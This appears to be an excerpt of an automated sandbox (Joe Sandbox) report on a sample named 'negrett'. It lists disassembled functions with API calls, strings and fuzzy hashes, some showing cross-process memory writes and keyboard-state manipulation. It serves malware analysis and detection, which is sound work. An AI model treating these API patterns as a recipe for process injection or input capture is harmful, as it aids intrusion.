Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cfcb50b0f919142ca6766bbde15bacbed395802718123c5dcad8eaf2515daed4
Instruction ID: 4ebcf1315d4b56b159a3c8cba03756fa629f7866c34d0b4d32d89da61a9b7a7f
Opcode Fuzzy Hash: cfcb50b0f919142ca6766bbde15bacbed395802718123c5dcad8eaf2515daed4
Instruction Fuzzy Hash: 4201D872800B029FCB30AF66D880802FBF9FF602453058A3ED1A252930C7B0A988CF84

Uniqueness

Uniqueness Score: -1.00%

Function 02A0CB3A Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A0CB52
_free.LIBCMT ref: 02A0CB64
_free.LIBCMT ref: 02A0CB76
_free.LIBCMT ref: 02A0CB88
_free.LIBCMT ref: 02A0CB9A

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
Instruction ID: 0794b9cc25db19b2116bd13ba6d91639299e5bb122dd1d6d81706b2976104297
Opcode Fuzzy Hash: 80a46d3f4cdf48cc1f4cb3fd7009116c9b0e75df3a7578b7af18df310060968e
Instruction Fuzzy Hash: 13F06D72580305ABC760FB68FAC0C5A7BDFAE057207A40D0AF14DE7580CF30F8819A68

Uniqueness

Uniqueness Score: -1.00%

Function 02A016A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A016BE
_free.LIBCMT ref: 02A016D0
_free.LIBCMT ref: 02A016E3
_free.LIBCMT ref: 02A016F4
_free.LIBCMT ref: 02A01705

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
Instruction ID: 0dc0ac5f2c312172eac39a425fbff6e615ee310b246a064fec3898b2b85e7beb
Opcode Fuzzy Hash: 4123fa34cb97fe27cc116b7268a18f97c13ccf456534f8fabfb79b2512b9f43b
Instruction Fuzzy Hash: FAF03A748422219B8711BF94BDC0D9D3BA6FB14751B14096FF818A32F0CB310413AF9C

Uniqueness

Uniqueness Score: -1.00%

Function 00B422A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B422BE

Part of subcall function 00B429C8: HeapFree.KERNEL32(00000000,00000000), ref: 00B429DE
Part of subcall function 00B429C8: GetLastError.KERNEL32(00000000,?,00B4D7D1,00000000,00000000,00000000,00000000,?,00B4D7F8,00000000,00000007,00000000,?,00B4DBF5,00000000,00000000), ref: 00B429F0

_free.LIBCMT ref: 00B422D0
_free.LIBCMT ref: 00B422E3
_free.LIBCMT ref: 00B422F4
_free.LIBCMT ref: 00B42305

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 22913d4a62476f37788f685e484896a3e59b8e898b81929031ad08ec689165d6
Instruction ID: cd10429ea3e5d578c5592ae5198b8fe0d940d0f7a597347bfd1dff05167a2c7b
Opcode Fuzzy Hash: 22913d4a62476f37788f685e484896a3e59b8e898b81929031ad08ec689165d6
Instruction Fuzzy Hash: 51F090704111919B8A12BF59BC8181C3FE4F7287607800597F000DB371CF724652FBE4

Uniqueness

Uniqueness Score: -1.00%

Function 02A555D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 029EF4A3: __onexit.LIBCMT ref: 029EF4A9

__Init_thread_footer.LIBCMT ref: 02A55638

Strings

x#M, xrefs: 02A5573A
x#M, xrefs: 02A5576F
x#M, xrefs: 02A55753

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: Init_thread_footer__onexit
String ID: x#M$x#M$x#M
API String ID: 1881088180-3829861524
Opcode ID: c993cd85d4cb7fcfa16d8338dd849fd7bda11aea73c75cc1440591dd505b9bff
Instruction ID: 238e132ae310d0db5eb2aa5098793d70ba8eeea1b11dc9ef8f4f2117a04953d2
Opcode Fuzzy Hash: c993cd85d4cb7fcfa16d8338dd849fd7bda11aea73c75cc1440591dd505b9bff
Instruction Fuzzy Hash: 2CC17D71A00215EFDB14DF68C890EBEB7FAFF48310F54806AE955AB290DB74E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A0FA5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMON

Download Yara Rule

APIs

__dosmaperr.LIBCMT ref: 02A0FB76
__dosmaperr.LIBCMT ref: 02A0FB95
__dosmaperr.LIBCMT ref: 02A0FD38

Strings

H, xrefs: 02A0FCBD

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: __dosmaperr
String ID: H
API String ID: 2332233096-2852464175
Opcode ID: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
Instruction ID: ddd259b69ff81b0a55552d7397d96d157fa5bb58d72a7b3f04b43b98c00526f6
Opcode Fuzzy Hash: 7e821adffe91cbc9713f8d52b49a87b3260336805fc21dec40f5ae5b36cdbdbf
Instruction Fuzzy Hash: 9CA1F632A041088FDF29DF68E8D1BAD7BA1EB46324F14015EE811EF2E1DF359912CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00B72716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B7B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B721D0,?,?,00000034,00000800,?,00000034), ref: 00B7B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B72760

Part of subcall function 00B7B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B721FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B7B3F8

Part of subcall function 00B7B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B7B355
Part of subcall function 00B7B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B72194,00000034,?,?,00001004,00000000,00000000), ref: 00B7B365
Part of subcall function 00B7B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B72194,00000034,?,?,00001004,00000000,00000000), ref: 00B7B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B727CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B7281A

Strings

@, xrefs: 00B72832

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 4521f8b076e934797aaa12f5efcc69c3488dbf073b8f72a8de7fe2a6b9987232
Instruction ID: db578234784f303129637cc3cea26466079735d4fa63767fdbec6e8cc4a7ff22
Opcode Fuzzy Hash: 4521f8b076e934797aaa12f5efcc69c3488dbf073b8f72a8de7fe2a6b9987232
Instruction Fuzzy Hash: 3341FD76900218AFDB10DBA4CD45FDEBBB8EF05700F108095FA59B7181DB716E85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B7C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 00B7C306
DeleteMenu.USER32 ref: 00B7C34C
DeleteMenu.USER32 ref: 00B7C395

Strings

0, xrefs: 00B7C2DF

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 46f65101c7c373c64008ac59682f3a967e841f3d78adbab87c959ab335b89214
Instruction ID: 6517bae3fa029ebf2500f3337ae953a646f96d9201645f1c9bf34a82b2b7fe31
Opcode Fuzzy Hash: 46f65101c7c373c64008ac59682f3a967e841f3d78adbab87c959ab335b89214
Instruction Fuzzy Hash: 0C419D312043019FD720DF24D885B5ABFE4EB85320F11CA9DF9B9972D2D730A904CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00BA44AA
GetWindowLongW.USER32 ref: 00BA44C7
SetWindowLongW.USER32 ref: 00BA44D7

Strings

SysTreeView32, xrefs: 00BA447C

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: f1a2b79df53efcf56a61d4144d614781bbca2364b2489779aea2a8d94889eba1
Instruction ID: 9cd98804e9a7938d2fba072a565f1df5c4466e87479e903f0a5ac9e106db7bfb
Opcode Fuzzy Hash: f1a2b79df53efcf56a61d4144d614781bbca2364b2489779aea2a8d94889eba1
Instruction Fuzzy Hash: AA317E31214605AFDB208E78DC45BDA7BE9EB4A334F204765F979932E0DBB0AC509750

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00BA4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00BA4713
DestroyWindow.USER32 ref: 00BA471A

Strings

msctls_updown32, xrefs: 00BA4684

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: e7626479dc0d7e4e0dff486b9c0af17c4374d0cdf2534341b3b23b23c274e09c
Instruction ID: 6afd8a53a5e6b2b6448c92f271c756b8c6cf9fc5bc128cb16ef7aebd524604cd
Opcode Fuzzy Hash: e7626479dc0d7e4e0dff486b9c0af17c4374d0cdf2534341b3b23b23c274e09c
Instruction Fuzzy Hash: C2215EB5604248AFDB10DF68DCC1DBB37EDEB8B394B140499FA009B261DB70EC51CA60

Uniqueness

Uniqueness Score: -1.00%

Function 00B849F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B84A08
GetVolumeInformationW.KERNEL32 ref: 00B84A5C
SetErrorMode.KERNEL32(00000000,?,?,00BACC08), ref: 00B84AD0

Strings

%lu, xrefs: 00B84A6F

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: 5efe8250d6404de381e5f468ac01c1181bfffd0d091a195a3fd04224d3976c3b
Instruction ID: 10fc1a7cf48dd2d1e9f20daf6a484fcfe67730c2e36beb86d4e02a38aa0899a4
Opcode Fuzzy Hash: 5efe8250d6404de381e5f468ac01c1181bfffd0d091a195a3fd04224d3976c3b
Instruction Fuzzy Hash: EE313075A00109AFD714DF54C885EAA7BF8EF09304F1480A5E909DB262DB71ED45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00BA41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00BA424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00BA4264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00BA4271

Strings

msctls_trackbar32, xrefs: 00BA4226

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: eeddd744ac79d9cf3cf3613ce262b0f7676746dad4f0d87f4d3853d9977ca9cb
Instruction ID: d73528818d9bc5d6735f2b1fe9f8b6432b65f43625cd842e47217bc13a24bd22
Opcode Fuzzy Hash: eeddd744ac79d9cf3cf3613ce262b0f7676746dad4f0d87f4d3853d9977ca9cb
Instruction Fuzzy Hash: 6711E331254248BEEF205E28CC46FAB3BECEF86B54F110524FA55E60A0D6B1DC519B50

Uniqueness

Uniqueness Score: -1.00%

Function 02A0AD52 Relevance: 6.4, APIs: 4, Instructions: 370COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02A0ADD4
_free.LIBCMT ref: 02A0ADF8
_free.LIBCMT ref: 02A0AF7F
_free.LIBCMT ref: 02A0B14B

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6afa368cd3e7c4108598805dd3060fa638451578f9be81892b4bfe554b6441f4
Instruction ID: 5e19bdab61d7d021c1cbfd1d1cf44c30fd9c72cb7b9bef5de19bda32e0685967
Opcode Fuzzy Hash: 6afa368cd3e7c4108598805dd3060fa638451578f9be81892b4bfe554b6441f4
Instruction Fuzzy Hash: BFC13772940305AFCB209F78BDD0BAA7BBAEF41350F1445AADA94D72D2EF319941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00B7007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 120a06077dbeccd10abe6c55daed01ae1394023aa0e4bdaac083276a7272cc92
Instruction ID: 9219158d29d71a532b97fde4d546222a40837fa5080bfd7fbb152d3119ee8155
Opcode Fuzzy Hash: 120a06077dbeccd10abe6c55daed01ae1394023aa0e4bdaac083276a7272cc92
Instruction Fuzzy Hash: D7C16975A1020AEFCB04DFA4C894AAEB7F5FF48304F218599E519EB291C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02A03280 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 02A0330B
__alldvrm.LIBCMT ref: 02A0350C
__alldvrm.LIBCMT ref: 02A0352E

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction ID: f841ce63c88685a4712e1cab24239ad4bfe9ee70843b428d4708a0a55ae0819e
Opcode Fuzzy Hash: 190bec492484a18a97fe5f025dcdb3e473ceac46589bc02d4dbe4f94f5be8f6e
Instruction Fuzzy Hash: FBA14172A003869FEF228F28E8D07AEBBE5EF51350F1841EDD5859B2C1CB799941CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02A08145 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction ID: 17fa451d17c2124f59361b8464cb366ce4cc7d795cc42b99f6805965de797442
Opcode Fuzzy Hash: 1a429c879d0e0c11a062f5037e8e0557d84ca674edd92bd5450c4b7a15ab3dcd
Instruction Fuzzy Hash: 8CC1E574D04249AFCB21DFA8E8C0BADBBB1BF49310F044199E954A73D2CB799941CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00B70436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000), ref: 00B705F0
CoTaskMemFree.OLE32(00000000), ref: 00B70608
CLSIDFromProgID.OLE32(?,?), ref: 00B7062D
_memcmp.LIBVCRUNTIME ref: 00B7064E

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 9f6f1136656f48a1d5cc09182856f51b3f7b1dd8e5a6d9cd88923e05a5328a87
Instruction ID: dba9669c8f8fa2639d4f35243f3af4f8958c2a9e01927e0ac7282eb6986e8b20
Opcode Fuzzy Hash: 9f6f1136656f48a1d5cc09182856f51b3f7b1dd8e5a6d9cd88923e05a5328a87
Instruction Fuzzy Hash: AE812971A10109EFCB04DF94C984EEEB7F9FF89315F208599E516AB250DB71AE06CB60

Uniqueness

Uniqueness Score: -1.00%

Function 02A6773C Relevance: 6.2, APIs: 4, Instructions: 196COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 02A6775A
_wcslen.LIBCMT ref: 02A6776E
_wcslen.LIBCMT ref: 02A67791
_wcslen.LIBCMT ref: 02A677B4

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: c3e9567cea0411148a6a70b0996802892ed174e2126378ff82080f9ce06fe4ae
Instruction ID: 26b1455a1a5b88675c6fc450c09102267a77b0c62f255e0bbdd5918f98af417b
Opcode Fuzzy Hash: c3e9567cea0411148a6a70b0996802892ed174e2126378ff82080f9ce06fe4ae
Instruction Fuzzy Hash: 9F61CF72910215BBEB14DF64CC88BBEB7A8EF08B24F10415AF915D61D0DB78A980CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00DE5240,?), ref: 00BA62E2
ScreenToClient.USER32(?,?), ref: 00BA6315
MoveWindow.USER32(?,?,?,?,000000FF,00000001), ref: 00BA6382

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000005.00000002.774460130.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BAC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774477735.0000000000BD2000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774497134.0000000000BDC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.774500900.0000000000BE4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_b10000_negrett.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bae3703af2ca61054c8a49803018a228a03ec1b8995be1941bcb5dcd3cbd2dac
Instruction ID: 6d1dcbb95549d825d7a373e8c79ba96abea856f75679b9f3a144457077fca5ee
Opcode Fuzzy Hash: bae3703af2ca61054c8a49803018a228a03ec1b8995be1941bcb5dcd3cbd2dac
Instruction Fuzzy Hash: 12513DB4904249EFCF10DF58D881AAE7BF5EF46360F148199F9159B290DB30ED42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02A0A81F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.768798026.00000000029D0000.00000004.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true

Associated: 00000005.00000003.768798026.0000000002A91000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000003.768798026.0000000002A9E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_29d0000_negrett.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
Instruction ID: fb966b66d10e1cb100d3b66d6f19b47d1f4245582ff2cd81f146bb66478b1e3a
Opcode Fuzzy Hash: 92300467f74a8ce655cf74ca6bdaee5cc0430d91273f78a41d58d6439cffd922
Instruction Fuzzy Hash: C0412971E40304AFD7249F78DC84BAABBE9EF84710F10862AE255DB6D1DB7199068BC4

Uniqueness

Uniqueness Score: -1.00%

Function 00B7AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B7ABF1
SetKeyboardState.USER32(00000080), ref: 00B7AC0D
PostMessageW.USER32 ref: 00B7AC74
SendInput.USER32(00000001,?,0000001C), ref: 00B7ACC6

Memory Dump Source

Source File: 00000005.00000002.774464819.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true

